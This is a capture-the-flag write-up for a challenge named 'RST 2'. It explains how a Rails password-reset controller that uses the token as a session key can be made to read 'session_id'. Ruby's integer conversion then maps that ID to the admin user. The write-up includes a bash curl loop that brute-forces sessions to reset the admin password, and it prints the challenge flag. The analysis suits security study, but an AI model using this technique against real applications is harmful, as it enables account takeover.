# RST 2
Write up by [@engwan](https://gitlab.com/engwan)

For this challenge, we're given the same username `admin@thetanuki.io` and
the same controller code:

```ruby
class ResetController < ApplicationController
  def password_reset
    @user = User.where(reset_password_token: params[:token]).first
    if @user
      session[params[:token]] = @user.id
    else
      user_id = session[params[:token]]
      @user = User.find(user_id) if user_id
    end
    if !@user
      render :plain => "no way!"
      return
    elsif params[:password] && @user && params[:password].length > 6
      @user.password = params[:password]
        if @user.save
          render :plain => "password changed ;)"
          return
        end
    end
    render :plain => "error saving password!"
  end
end
```

But this time, the routing has been fixed so we cannot pass in an empty
`token`:

```diff
diff --git a/config/routes.rb b/config/routes.rb
index f854b33..6497ce1 100644
--- a/config/routes.rb
+++ b/config/routes.rb
@@ -5,5 +5,5 @@ Rails.application.routes.draw do
     root to: 'home#index', as: :authenticated_root
   end
   root to: redirect('/users/sign_in')
-   get 'reset' => 'reset#password_reset'
+   get 'reset/:token' => 'reset#password_reset'
 end
```

Looking at the controller, there is a suspicious looking block:

```ruby
if @user
  session[params[:token]] = @user.id
else
  user_id = session[params[:token]]
  @user = User.find(user_id) if user_id
end
```

Here we're storing and retrieving the `user_id` from the session and we're
using the `token` parameter as the session key. This is unsafe because we
can provide some values of `token` to read other session data that would
give unexpected results.

One example of this is `session_id`. We can test this out by visiting
https://rst2.thetanuki.io/reset/session_id and we can see that it returns a
404 instead of the normal `no way!`. This means `user_id` isn't `nil` and
the `User.find` call raised an `ActiveRecord::RecordNotFound` exception
which was then caught and rendered as a 404.

By default, in Rails, the `session_id` is a [32-character hexadecimal
string](
https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/session/abstract_store.rb#L27).
And if we pass this to `find` this is automatically converted into an
integer.

In Ruby, the longest prefix of numbers is used to convert a string to
integer. For example:

```ruby
irb(main):003:0> "1234abc567".to_i
=> 1234
irb(main):004:0> "abc".to_i
=> 0
```

Knowing this, we can just retry this request while generating new session
IDs so that we can get the right prefix to find the admin user.

If the admin's ID is `1`, there is a 6 out of 256 (2.34 %) chance that we
get a prefix `1a`, `1b`, `1c`, `1d`, `1e`, or `1f`. We could also get
prefixes like `01`, `001`, etc.. which would also lead to the session ID
being casted to the integer `1`. So this shouldn't be too hard to do a
brute-force attack on.

We can do it with a bash script like this:

```bash
#!/bin/bash

while true
do
  echo "Generating session..."
  curl -b '_ctf_proxy=...' -c cookies.txt
https://rst2.thetanuki.io/users/sign_in

  echo "Trying to reset..."
  curl -b '_ctf_proxy=...' -b cookies.txt
https://rst2.thetanuki.io/reset/session_id?password=password123
end
```

The first request is to generate a session while saving the cookie in
`cookies.txt`. We then use this cookie in the second request to attempt to
change the password.

When the reset is successful, we should see `password changed ;)` in the
output.

We can then login with the password we just set and see the flag:

```
[tanuki](ec41e13496a4388f10e116e2f13e6c66)
```
